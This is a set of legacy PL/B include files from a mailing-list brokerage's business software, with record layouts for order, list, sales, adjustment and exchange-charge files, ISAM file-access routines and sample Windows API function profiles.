NCATCODEFLD8 DIM 4 // LIST FOCUS
.
NCATCODEVARS LIST
NCATCODENUM DIM 6 1-6 LIST NUMBER
NCATCODETYPE DIM 1 7-7 LIST TYPE
.1 "B" Byrs/Subs
.2 "D" Dnrs/Mbrs
.3 "C" Compiled
.4 "M" Misc.
NCATCODEMARKET DIM 70 8-77 BROAD MARKET
NCATCODESUBMARK DIM 70 78-147 SUB-MARKET
NCATCODEENV DIM 70 148-217 ENVIRONMENTAL
NCATCODEPOLIT DIM 70 218-287 POLITICAL
NCATCODEHEALTH DIM 70 288-357 HEALTH/CHARIT
NCATCODEPROG DIM 70 358-427 PROGRESSIVE
NCATCODEFOCUS DIM 1 428-428 LIST FOCUS
.1 "C" Christian
.2 "V" Veterans
.3 "P" Pets
.4 "W" Women
.5 "K" Children
.6 "S" Seniors
.7 "G" Gay/Lesbian
.8 "J" Jewish
NCATCODEFILL DIM 100 429-528
LISTEND
<file_sep>/include/PROFILE.INC
*==============================================================================
.
. Date: 19 May 1995
.
. Purpose: This include provides sample PROFILE Winapi function definitions.
.
*==============================================================================
.
. PROFILE declarations defines the parameter criteria needed to use an
. API function. The compiler uses the PROFILE definition to verify the
. syntax of a WINAPI statement. The PROFILE definitions also control the
. WINAPI statement setup to execute and return values for an API function.
. The the SDBWIN.RFM for specific syntax and type parameters.
.
.
. Format:
.
.<Label> PROFILE DllName,EntryName,TypeRet[,TypeParm1[,TypeParm2...]]
.
. Where: DllName - Defines the DLL name which contains the API to be
. used for a statement using this profile.
.
. EntryName - Defines the actual API system call name to be used.
.
. If the function is a UNICODE enabled function, then
. the name must have a character 'A' (ASCII) or 'W'
. (WIDE) appended to it. A UNICODE enabled function
. can be determined when a parameter of the API
. function is string variable. The 'A' character
. indicates that the string parameters contain ASCII
. zero terminated data. The 'W' indicates that the
. string parameters contain UNICODE string data.
.
. TypeRet - This defines the data type of the variable which will
. receive the result of the API call. This field can
. be any of the keywords defined in the following type
. indicators.
.
. INT1 - Defines an INTEGER 1 type.
. INT2 - Defines an INTEGER 2 type.
. INT4 - Defines an INTEGER 4 type.
. DIM - Defines a string data type.
. PINT1 - Defines an INTEGER 1 pointer type.
. PINT2 - Defines an INTEGER 2 pointer type.
. PINT4 - Defines an INTEGER 4 pointer type.
. NONE - Defines nothing returned. This is only valid for the
. return value operand.
.
. TypeParm1 - This defines the data type of the first parameter
. used for an API call.
.
. TypeParm2 - This defines the data type of the second parameter
. used for an API call.
.
.
*---GetVersion-----------------------------------------------------------------
.
. The PROFILE labeled 'GetVer' defines the parameters needed to execute
. the Window's API function 'GetVersion'. The function returns a hex value
. whose high and low order bytes define release and version of Windows being
. executed. There are three parameters defined as follows:
.
. 1. kernel32 - This defines a basic Window's DLL module to use.
.
. 2. GetVersion - This defines the API function name to be executed
. by a WINAPI statement when using this PROFILE.
.
. 3. INT2 - The third operand defines the type of variable
. to be used for a RETURN value. In this case we
. are only requesting a 16 bit value be returned.
.
GetVer PROFILE kernel32, GetVersion, INT2
.
*---GetDriveType---------------------------------------------------------------
.
. The PROFILE labeled 'GetDrv' defines the parameters needed to execute
. the Window's API function 'GetDriveType'. The function returns a value
. which identifies the type of drive being used. There are four parameters
. defined as follows:
.
. 1. kernel32 - This defines a basic Window's DLL module to use.
.
. 2. GetDriveTypeA - This defines the API function name to be executed
. by a WINAPI statement when using this PROFILE.
. You will note that the character 'A' has been
. appended to the function name. This is required
. by Windows to identify the format of string data
. used in the parameter list. In this case, the
. DIM parameter in the parameter list contains
. an ASCII string terminated with a binary zero.
.
. 3. INT4 - The third operand defines the type of variable
. to be used for a RETURN value. In this case we
. are only requesting a 32 bit value be returned.
.
. 0 - Function cannot determine drive type.
. 1 - Specified drive does not exist.
. 2 - Drive removeable.
. 3 - Drive fixed.
. 4 - Drive remote (network).
.
. 4. DIM - The fourth operand defines the type of variable
. to be used for the first variable in the parameter
. list. In this case the variable is a DIM type.
. Note that the 'A' at the end of the function name
. indicates that this variable should contain an
. ASCII string terminated with a binary zero.
.
GetDrv PROFILE kernel32, GetDriveTypeA, INT4, DIM
.
*---GetWindowsDirectory--------------------------------------------------------
.
. The PROFILE labeled 'GetName' defines the parameters needed to execute
. the Window's API function 'GetWindowsDirectory'. The function returns a
. value which indicates if the function work or not. In addition, the name
. of the Windows directory is placed into the DIM variable found in the
. parameter list. There are four parameters defined as follows:
.
. 1. kernel32 - This defines a basic Window's DLL module to use.
.
. 2. GetWindowsDirectoryA
. - This defines the API function name to be executed
. by a WINAPI statement when using this PROFILE.
. You will note that the character 'A' has been
. appended to the function name. This is required
. by Windows to identify the format of string data
. used in the parameter list. In this case, the
. DIM parameter in the parameter list will have
. an ASCII string terminated with a binary zero
. placed into it by the API function.
.
. 3. INT4 - The third operand defines the type of variable
. to be used for a RETURN value. In this case we
. are only requesting a 32 bit value be returned.
.
. 0 - Function failed.
. nn - The return value is the length of the
. string placed into the DIM variable not
. including the NULL character which was
. also stored.
.
. 4. DIM - The fourth operand defines the type of variable
. to be used for the first variable in the parameter
. list. In this case the API function will store
. the name of the Windows directory with a NULL
. character as the terminator.
.
. 5. PINT4 - The fifth operand defines the type of variable
. to be used for the second variable in the API
. function parameter list. In this case the PINT4
. indicates that the function call expects a pointer
. to the actual value is to be passed to the API
. function. For this function, the value of this
. variables defines how big the output buffer is.
.
GetName PROFILE kernel32, GetWindowsDirectoryA, INT4, DIM, PINT4
.
*---GetPrivateProfileString----------------------------------------------------
.
. In this case the 'GetPPStr' PROFILE defines a function which will allow
. the KEYWORD string data from a '.INI' file to be retrieved. The parameters
. are defined as follows.
.
GetPPStr PROFILE kernel32: ;DLL name
GetPrivateProfileStringA: ;API name
INT2: ;16 bit return value
DIM: ;Application name in init. file
DIM: ;Keyword name
DIM: ;Default if not found
DIM: ;Return buffer
INT2: ;Maximum return buffer size
DIM ;Name of initialization file
.
*---GetCursorPos---------------------------------------------------------------
.
. The 'GetCurse' PROFILE defines a function which allows the current absolute
. mouse cursor coordinates to be retrieved. This function has a single
. parameter used which is a Windows structure named POINT. The structure
. POINT contains two members which define the x and y coordinates of the
. mouse cursor. There this PROFILE defines that the function parameter is
. a DIM which causes the user dim variable address to be passed to the
. 'GetCursorPos'. When this function is completed, the user dim variable
. will contain the POINT structure member data. This is a sample of how
. a structure can be used with WINAPI functions.
.
GetCurse PROFILE user32: ;DLL name
GetCursorPos: ;API name
INT4: ;32 bit return value
DIM ;DIM value to be used for structure
; member data. After a call to this
; function a user can unpack the
; DIM data into 2 integer variables
; to get the coordinates of mouse.
.
*---FindFirstFile--------------------------------------------------------------
.
. The 'FindFirstFile' function finds the first occurance of a file specified
. by the Filename parameter. The file properities are placed into the
. second parameter which is a FileData Structure.
.
FindFirst PROFILE kernel32: ;DLL name
FindFirstFileA: ;API name ( ASCIIZ string format )
INT4: ;File Handle return value
DIM: ;Search File Name ( ASCIIZ required )
DIM ;FileData structure
.
*---FindNextFile---------------------------------------------------------------
.
. The 'FindNextFile' function finds the next occurance of a file after a
. 'FindFirstFile' has succeeded. The return value will be non-zero when
. 'FindNextFile' locates another file. The return value will be zero
. when no more files are found. When a file is found, the second parameter
. will contain the FileData structure information for the file found.
. The first parameter of the function is the File Handle value returned
. from a successful 'FindFirstFile' operation.
.
FindNext PROFILE kernel32, FindNextFileA, INT1, INT4, DIM
.
*---FindClose------------------------------------------------------------------
.
. The 'FindClose' function closes the File Handle returned from a
. successful 'FindFirstFile' function.
.
FindClose PROFILE kernel32, FindClose, INT1, INT4
.
*------------------------------------------------------------------------------
<file_sep>/include/integralbak.inc
FILE SPECS
*******************************************
***************LRFile.dat******************
*******************************************
(Note: These are identical to file specs previously provided,)
(with the exception of the Exchange History, which will now be)
(provided in a separate file. I have used this space to store)
(the Broker Company Name.)
Order Code 1 Text
Order Status 1 Text “0”=Live, “B”=Billed, “Q”=Cancelled Billed, “X”=Cancelled, “l”=LCR, “z”=Cancelled LCR, “p”=Pending, “x”=Cancelled Pending
Mailer Number 4 Numeric
LR Number (Key) 6 Numeric
Mailer Contact Number 3 Numeric Obsolete
List Number 6 Numeric
List Owner Number 4 Numeric
Mailer Purchase Order Number 12 Text
Order Quantity 9 Numeric
*Price Per Thousand 5 Numeric
Mailer Key 12 Text
Media Code 2 Numeric
Return Date 8 Numeric
Mail Date 8 Numeric
Order Test Code 1 Numeric
Selection on Test Code 1 Numeric
Continuation Code 1 Numeric
Continuation LR Number 6 Numeric
Order Date of Continuation LR 8 Numeric
Qty of Continuation LR 9 Numeric
Spec. Instruction Codes 24 Numeric Obsolete
Bill Direct Code 1 Numeric
Broker Guarantee Code 1 Numeric
Entire/Rent/Exchange Code 1 Numeric “1”=Entire, “2”=Exchange, “3”=Entire & Exchange
Offer Number 7 Numeric first 4 bytes are Obsolete
Offer Description 5 Text Obsolete
Order Net Quantity 9 Numeric
Order Campaign Number 6 Numeric
Clearance Status 1 Numeric
Clearance Initials 3 Text
Broker Notification Byte 1 Numeric Used only by List Management
Clearance Date 8 Numeric
LCR Rental Request Byte 1 Numeric
LCR History Byte 1 Text
*Exchange Price per Thousand 5 Numeric
Return To Company Number 4 Numeric
Tape Return Byte 1 Numeric Obsolete
List/Select Universe 9 Numeric
Salesperson Code 2 Numeric
NINCA Contact Code 2 Numeric
NINCA Caller Code 2 Numeric
Order Date 8 Numeric
Sample Code 1 Numeric
Comselect Code 1 Numeric
Shipping Method Code 2 Numeric
List Name 35 Text
Select Name 35 Text
ReUse LR Number 6 Numeric
Typist Initials 3 Text
Order Exchange Quantity 9 Numeric
NINCA Guarantee Code 1 Numeric
Broker Number 4 Numeric
Broker Contact Number 3 Numeric
Sample Number 3 Numeric
Net Name Percentage 2 Numeric
Net name Running Charge 3.2 Numeric (total of 6 bytes)
Net Flag 1 Numeric
Net Name Minimum 7 Numeric
Filler 80 Text
Mailer Name 45 Text
Owner Name 25 Text
Offer Name 45 Text
Broker Name 45 Text
Merge Percentage 10 Numeric Merge % Percentage for this LR
Datacard Exc/Rent Limitations 1 Numeric “1”=Rent or Exchange, “2”=Exchange Only, “3”=Rental Only
Datacard Revision Date 10 Text Formatted as MM/DD/CCYY
Last Merge % for Mlr/List 6 Numeric Merge % for LR with this Mlr/List with latest Order Date
LCR/Pending Order SubStatus Desc. 45 Text Will remain blank until LCRs/Pending Orders are sent to Integral
Gross Billed Quantity 8 Numeric
Net Merge Quantity 8 Numeric
Total Billed (AR) 10.2 Numeric (total of 13 bytes)
Base Price 5.2 Numeric
Select Price 5.2 Numeric If applicable
Price Calculator 20 Text "/m", "Flat", etc.
Select Number 4 Numeric Valid Number OR "XXXX" = keyed in Select OR "----" = Order placed before new Datacard logic
Select Name 75 Text
*********************************************
***************ListFile.dat******************
*********************************************
List Number(Key) 6 Numeric
List Name 75 Text
Status 1 Text "W"=Withdrawn, "T"=Temporarily Withdrawn
Universe 9 Numeric
*********************************************
***************BaseFile.dat******************
*********************************************
(Note: The Base Text should be pretty solid. However, there MAY)
(be lines that contain garbage. We are working with standards, when)
(extracting the data, which MAY not have been followed for the Old/Inactive Lists.)
(The only bad Base Text fields that I found were all attached to Inactive Lists.)
List Number(Key) 6 Numeric
Base Number(Key) 2 Numeric
Base Code 4 Text "BASE"=Base, "SEC."=Secondary Base
Base Text 46 Text May Include: Name, Universe, Price
*********************************************
***************SelFile.dat******************
*********************************************
List Number(Key) 6 Numeric
Select Number (Key) 4 Unique Numeric Identifier
Select Name 75 Text
Select Quantity 10 Numeric
Select Price 5.2 Numeric (Total of 8 bytes)
If the record is a Base/Secondary Base or unassociated Select,
this field represents the total Select Price. If the record
does have an associated Base/Secondary Base, this field would need
to be added to the Select Price of the associated Base/Secondary Base
in order to achieve the correct total. It was done this way to allow
different print options.
Commission Flag 1 Numeric
Price Modifier 3 Numeric
Inactive Flag 1 Numeric '1' = Inactive Select
Select Status 1 Numeric '1' = Special (does not print), '2' = Office Use Only
Notes Flag 1 Numeric '1' = User should view Notes field in corresponding Datacard
Exchange Flag 1 Numeric ' ' of '0' = Exchange or Rent, '1' = Exchange Only, '2' = Rental Only
Base Association 4 Text 'BASE' = Base Select - 1 per Datacard
'SEC.' = Secondary Base Select - 0+ per Datacard
A 4 byte Numeric field in this location establishes this record as a Select
off of a Base/Secondary Base. That 4 byte number would be the corresponding
Select Number of a Base/Secondary Base record.
There is the possibility of no data in this location. This would pertain to a Select
that is independent of an associated Base/Secondary Base, but is not a Base/Secondary Base
itself.
Index Flag 4 Numeric Established Print/Display order of Select Records for a Datacard
Select Date 8 Numeric
Initials 3 Text
Filler 11 Text
********************************************
***************PkgFile.dat******************
********************************************
(The following fields are mutually exclusive: )
(Master Package Indicator)
(Master Package Associaton Number)
(Note on Master Packages: A Master Package will have an Indicator value of "1",)
(and the Association Number will be cleared. Regular Packages may have a valid)
(Master Package Number in the Association Number field.)
Mailer Number(Key) 4 Numeric
Package Number(Key) 6 Numeric
Package Name 150 Text
Client Package ID 25 Text
Package Date 8 Numeric
Package Notes 500 Text
Master Package Indicator 1 Numeric
Master Package Association Number 6 Numeric
Filler 93 Text
*********************************************
***************PkgPFile.dat******************
*********************************************
Mailer Number(Key) 4 Numeric
Package Number(Key) 6 Numeric
Price Date(Key) 8 Numeric
Package Print Price 6.2 Numeric (total of 9 bytes)
Package Postage Price 6.2 Numeric (total of 9 bytes)
Package Premium Price 6.2 Numeric (total of 9 bytes)
Package Total Price 8.2 Numeric (total of 9 bytes)
Price Notes 200 Text
Filler 100 Text
*********************************************
***************XRefFile.dat******************
*********************************************
List Number(Key) 6 Numeric
Mailer Number(Key) 4 Numeric
*********************************************
***************ExchFile.dat******************
*********************************************
(Note on Inactivated Date: This field will USUALLY contain valid data)
(if the Flag has a value of "I". Otherwise do not be surprised to garbage)
(in this field!)
Mailer1 Number(Key) 4 Numeric
Mailer2 Number(Key) 4 Numeric
Inactivated Date 8 Text** See Notes
Entry Number 5 Numeric
Flag 1 Text " "=normal, "I" = inactive
Mailer1 Usage 10 Numeric
Mailer2 Usage 10 Numeric
*********************************************
***************SamFile.dat******************
*********************************************
Mailer Number 4 Numeric
Sample Number 3 Numeric
Sample Description 30 Text
Sample Description 2 30 Text
Sample Date 8 Numeric
Record Date 8 Numeric
User Name 9 Text
Inactive Code 1 Numeric "1" = Sample is Inactive
*********************************************
***************OffFile.dat******************
*********************************************
Offer code 1 Text (Obsolete)
Mailer Number 4 Numeric
Offer Number 3 Numeric
Offer Description 40 Text
User Name 10 Text
Record Date 8 Numeric
*********************************************
***************ConFile.dat******************
*********************************************
Contact Number 2 Numeric
Contact Name 35 Text
Contact Phone Number 25 Text
Contact Port Number 3 Numeric
Team Number 2 Numeric (Not implemented)
Rights 1 Numeric (Not implemented)
Rights 2 40 Numeric (Not implemented)
Default Printer 1 Numeric
Caller/Planner 1 Numeric
*********************************************
***************MedFile.dat******************
*********************************************
Media Number 2 Numeric
Media Name 50 Text
*********************************************
***************ShipFile.dat******************
*********************************************
Shipping Number 2 Numeric
Shipping Description 35 Text
*********************************************
***************TxtFile.dat******************
*********************************************
(Unique identifier starts at '1', allowing up to nine 500 byte records of Free TExt per Datacard.)
Datacard Number 6 Numeric
Text Number 1 Numeric
Text 500 Text
*********************************************
***************PrcFile.dat******************
*********************************************
(Additional Prices associated with an Order)
LR Number (Key) 6 Numeric
Additional Price Amount 5.2 Numeric
Additional Price Text 46 Text
Additional Price Calculator 20 Text<file_sep>/include/NSLSDD.inc
.; Last change: BC 27 Jan 2003 7:24 am
.* *****************************************************************************
.* NAMES IN THE NEWS MASTER EOM SALES FILE.
.* *****************************************************************************
.
. FILE: NINSLS
. LENGTH: 163
.COMPRESS:
. TYPE: SEQ
. KEY: NONE
.revised 24Sep07 PLI Patch 1.3
.revised 27APr99 DLH NININV Y2k patch 1.2
. REVISED 20JAN99 ASH NINORD Y2K, File expansion Patch #1.1
.revised 10mar95 dlh added adjust flag
. REVISED 17FEB95 ADDED CHECK DATE/MCOMP .
. REVISED 19APR93 ADDED OUTSIDE GUAR CODE BYTE 15, TAKEN FROM ORDER
. 02nov93 added a/r for new list manag statement
...............................................................................
NSLSFILE FILE
NSLSFLE2 IFILE KEYLEN=4
NSLSNAME INIT "NINSLS|NINS1:502 "
nslsfld dim 4
NSLSFLAG FORM 1
NSLSPATH FORM 1
.
SLSvars list
SLSMLR FORM 4 1-4 MAILER NUMBER. NIN
.begin patch 1.3 PLI COnversion
.SLSLR FORM 6 5-10 LIST RENTAL NUMBER. NIN
SLSLR Dim 6 5-10 LIST RENTAL NUMBER. NIN
.end patch 1.3 PLI COnversion
SLSOWN FORM 4 11-14 LIST OWNER NUMBER. NIN
SLSGUAR1 DIM 1 15-15 OUTSIDE GUARANTY NIN
SLSCNT DIM 3 16-18 BROKER NUMBER. NIN
.SLSCNT FORM 3 16-18 BROKER NUMBER. NIN
.SLSLIST FORM 6 19-24 LIST NUMBER. NIN
SLSLIST FORM 6 19-24 LIST NUMBER. NIN
.Start Patch #1.1 - increased var
.SLSMDTE FORM 6 25-30 MAIL DATE. NIN
.SLSAP1 FORM 7 33-39 ACCOUNT PAYABLE ONE. NIN
SLSMDTE FORM 8 25-32 MAIL DATE (CCYYMMDD) NIN
.start patch 1.2
.SLSAP1 FORM 9 33-41 ACCOUNT PAYABLE ONE. NIN
SLSAP1 FORM 10.2 33-45 ACCOUNT PAYABLE ONE. NIN
.end patch 1.2
.End Patch #1.1 - increased var
SLSDJCD DIM 1 46-46 DOW JONES CODE. NIN
SLSADJCD DIM 1 47-47 ADJUSTMENT CODE. NIN
.Start Patch #1.1 - increased var
.SLSIDTE FORM 6 44-48 INVOICE DATE. NIN
SLSIDTE FORM 8 48-55 INVOICE DATE (CCYYMMDD) NIN
.END Patch #1.1 - increased var
.begin patch 1.2
.SLSAP2 FORM 9 52-60 ACCOUNTS PAYABLE TWO. NIN
SLSAP2 FORM 10.2 56-68 ACCOUNTS PAYABLE TWO. NIN
.end patch 1.2
SLSLST1 DIM 35 69-103 LIST DESCRIPTION ONE. NIN
SLSCODE DIM 1 104-104 CREDIT/DEBIT CODE,'C or D'NIN
SLSGUAR DIM 1 105-105 GUARANTY CODE. NIN
.Start Patch #1.1 - increased var
.slsAR DIM 8 94-101 A/R (NO DECIMAL)
.begin patch 1.2
.slsAR DIM 9 98-106 A/R (NO DECIMAL)
slsAR form 10.2 106-118 A/R (NO DECIMAL)
.end patch 1.2
.End Patch #1.1 - increased var
.begin patch 1.2
.SLSCHKDTE DIM 6 107-112 INV CHECK DATE
SLSCHKDTE DIM 8 119-126 INV CHECK DATE ccyymmdd
.end patch 1.2
SLSCNAME DIM 25 127-151 CLIENT NAME
slsadjsw form 2 152-153 adjustment switch 2-adjusted
slsxchrg form 7.2 154-163
listend
. .............................................................................
.
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.NEOM0013
LISTON
<file_sep>/include/statnio.inc
..............................................................................
.
. statnio INCLUSION
. Stats FILE DEFINITION
.
. FILE NAME : nstatnote
. REC LENGTH: 212 FIXED
. INDEX KEY :
..............................................................................
.
..............................................................................
.
. ENTRY POINT : statnKEY
. REQUIRED : 'statnFLD'
. RETURNED : STAT NOTES RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
statnKEY branch statnflag to statn1
CALL statnOPEN
statn1
trap IOMssg giving Error if IO
branch statnlock to statn1L,statn1R,statn1N
statn1L FILEPI 1;statnFILE
READ statnFILE,statnFLD;statnVARS
trapclr IO
RETURN
statn1R
READLK statnFILE,statnFLD;statnVARS
trapclr IO
RETURN
statn1N
READ statnFILE,statnFLD;statnVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : statnTST
. REQUIRED :
. RETURNED :
. DESCRIPTION : TEST KEY
.
statnTST branch statnflag to statn2
CALL statnOPEN
statn2 FILEPI 1;statnFILE
READ statnFILE,statnFLD;;
RETURN
..............................................................................
.
. ENTRY POINT : statnKS
. REQUIRED :
. RETURNED : STATS NOTES RECORD
. DESCRIPTION : KEY SEQUENTIAL STATS NOTES FILE READ
.
statnKs branch statnflag to statn3
CALL statnOPEN
statn3 FILEPI 1;statnFILE
READKS statnFILE;statnVARS
RETURN
..............................................................................
.
. ENTRY POINT : statnSEQ
. REQUIRED :
. RETURNED : STATS NOTES RECORD
. DESCRIPTION : SEQUENTIAL STATS NOTES FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
statnSEQ BRANCH statnflag TO statn4
CALL statnOPEN
statn4 FILEPI 1;statnFILE
READ statnFILE,SEQ;statnVARS
RETURN
..............................................................................
.
. ENTRY POINT : statnWRT
. REQUIRED :
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
statnWRT BRANCH statnflag OF statn5
CALL statnOPEN
statn5
FILEPI 1;statnFLst
WRITE statnFlst;statnVARS
RETURN
..............................................................................
.
. ENTRY POINT : statnUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE STATS NOTES FILE
.
statnUPD
BRANCH statnflag TO statn6
CALL statnOPEN
statn6
FILEPI 1;statnFlst
UPDATE statnFlst;statnVARS
RETURN
..............................................................................
.
. ENTRY POINT : statnDEL
. REQUIRED : 'MKEY'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
statnDEL BRANCH statnflag TO statn7
CALL statnOPEN
statn7
FILEPI 1;statnFlst
DELETE statnFLst
RETURN
..............................................................................
.
. ENTRY POINT : statnOPEN
. REQUIRED : 'statnflag'
. RETURNED : 'statnflag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN STATS NOTES FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
statnOPEN
TRAP statnGONE giving error IF IO
OPEN statnFlst
TRAPCLR IO
MOVE C1 TO statnflag
RETURN
.
statnGONE
MOVE statnNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
.END OF INCLUDE
<file_sep>/include/NRCHGDD.INC
.
. Last change: DMB 14 Aug 2001 8:45 pm Turning Live
. DMB 17 Jul 2001 10:53 pm
..............................................................................
.
. NRCHGDD INCLUSION
.
. FILE NAME : EXCHARGE.DAT
. REC LENGTH: 66
. INDEX KEY: 1-6 LR
..............................................................................
.
NRCHGFLE FILE
EXCHARGE IFILE KEYLEN=6,FIXED=66,DUP,"Name=Excharge|NINS1:502"
EXPRINT IFILE KEYLEN=20,STATIC=5
.NRCHGNAME INIT "DBTEST"
NRCHGNAME INIT "EXCHARGE|NINS1:502"
NRCHGFLD DIM 6
NRCHGFLAG FORM 1
NRCHGFLG2 FORM 1
NRCHGlock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NRCHGVARS list
NRCHGLR DIM 6 (INDEX KEY)= 1-6
NRCHGMLR DIM 4 7-10 MALIER NAME
NRCHGMLRCNT DIM 3 11-13 MAILER/CONTACT NUMBER
NRCHGLN DIM 6 14-19 LIST NUMBER
NRCHGOWNER DIM 4 20-23 OWNER NUMBER
NRCHGTPI DIM 6 24-29 TRIPLEX INVOICE #
NRCHGQTY FORM 9 30-38 QUANTITY
NRCHGAR FORM 8.2 39-49 A/R
NRCHGAP FORM 8.2 50-60 A/P
NRCHGCE DIM 2 61-62
NRCHGYR DIM 2 65-66
NRCHGMO DIM 2 65-66
listend
<file_sep>/include/MDCMainIO.inc
..............................................................................
.******************************************************
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_MAIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam & AAM
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : MInKEY
. REQUIRED : 'MInFLD'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MInKEY BRANCH MInFlag TO MIn1
CALL MInOPEN
MIn1 FILEPI 1;MInFile
READ MInFile,MInFLD;MinMainVARS
RETURN
..............................................................................
.
. ENTRY POINT : MInTST
. REQUIRED : MInFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
MInTST BRANCH MInFlag TO MIn2
CALL MInOPEN
MIn2 FILEPI 1;MInFile
READ MInFile,MInFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : MInKS
. REQUIRED :
. RETURNED : Min Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
MInKS BRANCH MInFlag TO MIn3
CALL MInOPEN
MIn3 FILEPI 1;MInFile
READKS MInFile;MinMainVARS
RETURN
..............................................................................
. ENTRY POINT : MInSEQ
. REQUIRED :
. RETURNED : Min Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
MInSEQ BRANCH MInFlag TO MIn4
CALL MInOPEN
MIn4 FILEPI 1;MInFile
READ MInFile,SEQ;MinMainVARS
RETURN
..............................................................................
.
. ENTRY POINT : MInWRT
. REQUIRED : 'MInFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
MInWRT BRANCH MInFlag TO MIn5
CALL MInOPEN
MIn5 FILEPI 1;MInFile
WRITE MinFlist;MinMainVARS
RETURN
..............................................................................
.
. ENTRY POINT : MInUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
MInUPD BRANCH MInFlag TO MIn6
CALL MInOPEN
MIn6
. FILEPI 1;MInFile
. UPDATE MInFile;MinMainVARS
UPDATE MinFlist;MinMainVARS
RETURN
..............................................................................
.
. ENTRY POINT : MInDEL
. REQUIRED : 'MInFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
MInDEL BRANCH MInFlag TO MIn7
CALL MInOPEN
MIn7 FILEPI 1;MInFile
DELETE MinFlist
. DELETE MInFile,MInFLD
RETURN
..............................................................................
.
. ENTRY POINT : MInAIM
. REQUIRED : MInFLD2
. RETURNED : Min Main Record
. DESCRIPTION : AIM MDC MainFILE READ
. APPLICA TION'S RESPONSIBILITY TO TEST FLGS
.
MInAIM BRANCH MInFlag TO MIn8
CALL MInOpen
MIn8 FILEPI 1;MInFile2
READ MInFile2,MInFLD2;MinMainVARS
RETURN
..............................................................................
.
. ENTRY POINT : MInKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : Min Main Record
. DESCRIPTION : AIM KEY GENEREIC MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MInKG BRANCH MInFlag TO MIn10
CALL MInOpen
MIn10 FILEPI 1;MInFile2
READKG MInFile2;MinMainVARS
RETURN
..............................................................................
.
. ENTRY POINT : MInKGP
. REQUIRED : PREVIOUS VALID AIM READ
. RETURNED : Min Main Record
. DESCRIPTION : KEY GENERIC PRIOR MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MInKGP BRANCH MInFlag TO MIn11
CALL MInOpen
MIn11 FILEPI 1;MInFile2
READKGP MInFile2;MinMainVARS
RETURN
...............................................................................
.
. ENTRY POINT : MInOPEN
. REQUIRED : 'MInFlag' 'MInPATH'
. RETURNED : 'MInFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
MInOPEN TRAP MInGONE giving error IF IO
OPEN MinFlist
TRAPCLR IO
MOVE C1 TO MInFlag
RETURN
..............................................................................
MInGONE MOVE MInNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/Nadjdd.inc
..............................................................................
.
. NADJDD INCLUSION
. NIN ADJUSTMENT FILE DEFINITION
.
. FILE NAME : NINADJ
. REC LENGTH: 151 FIXED
. INDEX KEY : 7-12 (LR#)
.
.patch 1.3 2007 September 14 DLH - PLI
.patch 1.2 2005 June 18 DMB - Changed IP of File Manager
.patch 1.1 y2k elim MP var list etc
..............................................................................
.
.begin patch 1.1
.NADJFILE IFILE KEYLEN=6,FIXED=90
.begin patch 1.3
.NADJFILE IFILE KEYLEN=6,FIXED=151
NADJFILE IFILE KEYLEN=6,FIXED=173
.begin patch 1.3
.end patch 1.1
.NADJNAME INIT "NINADJ "
.>Patch 1.2 Begin
.NADJNAME INIT "NINADJ.ISI|20.20.30.103:502 "
NADJNAME INIT "NINADJ.ISI|NINS1:502 "
.>Patch 1.2 End
NADJFLD DIM 6
NADJFLAG FORM 1
.
adjvars list
ASCODE DIM 1 1-1 'J'
ASTATUS DIM 1 2-2 '0' OR 'P'
ASMLRNUM DIM 4 3-6 MAILER NUMBER FROM INVOICE RECORD.
ASLRNUM DIM 6 7-12 LR NUMBER - KEY.
ASRECADJ form 10.2 13-25 ACCOUNTS RECEIVABLE ADJUSTMENT.
ASPAYAD1 form 10.2 26-38 ACCOUNTS PAYABLE 1 ADJUSTMENT.
ASPAYAD2 form 10.2 39-51 ACCOUNTS PAYABLE 2 ADJUSTMENT.
ASPAYAD3 form 10.2 42-64 ACCOUNTS PAYABLE 3 ADJUSTMENT. inter company
ASLRINC form 10.2 55-77 LIST RENTAL INCOME ADJUSTMENT.
ASNININC form 10.2 68-90 Non comm INCOME ADJUSTMENT.
ASREUSE DIM 1 91-91 RE-USE/RUN CHARGE CODE (1-4).
ASCRDB DIM 1 92-92 CREDIT OR DEBIT CODE (C 0R D).
